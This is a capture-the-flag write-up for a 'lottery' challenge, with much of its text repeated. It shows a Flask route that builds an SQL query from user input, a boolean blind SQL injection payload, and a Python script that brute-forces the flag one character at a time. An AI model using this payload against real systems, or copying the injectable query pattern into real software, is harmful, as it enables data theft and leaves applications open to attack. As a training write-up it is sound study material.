lottery
SRC: https://library.m0unt41n.ch/challenges/lottery
Blind SQL injection
This code allows for sql injections but doesn't return any data, just a boolean, if there were rows found or not. This allows typical blind injections / boolean logic injections.
Therefore we craft a query which allows us too bruteforce chars for each position in the flag:
' OR SUBSTR((SELECT answer FROM answers WHERE answer LIKE 'cyberskills23{%'),1,1)='c' --
Flag prefix was known, so we just perform a substring on all positions until we hit a } .
Here's the finished exploit:
SRC: https://library.m0unt41n.ch/challenges/lottery
Blind SQL injection
Python:
@app.route("/", methods=["GET", "POST"])
def index():
has_guessed = False
answer_correct = False
if request.method == "POST":
has_guessed = True
guess = request.form.get("guess", "")
cur.execute(f"SELECT * FROM answers WHERE answer = '{guess}'")
rows = cur.fetchall()
answer_correct = len(rows) > 0
return render_template("index.html", has_guessed=has_guessed, answer_correct=answer_correct)This code allows for sql injections but doesn't return any data, just a boolean, if there were rows found or not. This allows typical blind injections / boolean logic injections.
Therefore we craft a query which allows us too bruteforce chars for each position in the flag:
' OR SUBSTR((SELECT answer FROM answers WHERE answer LIKE 'cyberskills23{%'),1,1)='c' --
Flag prefix was known, so we just perform a substring on all positions until we hit a } .
Here's the finished exploit:
Python:
import string, requests
URL = 'remote'
flag = ''
max_length = 150
for pos in range(15, max_length): #we know the prefix, since its kinda long it was worth adjusting the range
for ch in string.printable:
payload = (
"' OR SUBSTR((SELECT answer FROM answers WHERE answer LIKE 'cyberskills23{%'),"
f"{pos},1)='{ch}' -- "
)
r = requests.post(URL, data={'guess': payload})
if 'alert-success' in r.text:
flag += ch
print(f"Pos {pos}: {ch}")
break
if flag.endswith('}'):
break
print("Flag:", "cyberskills23{" + flag)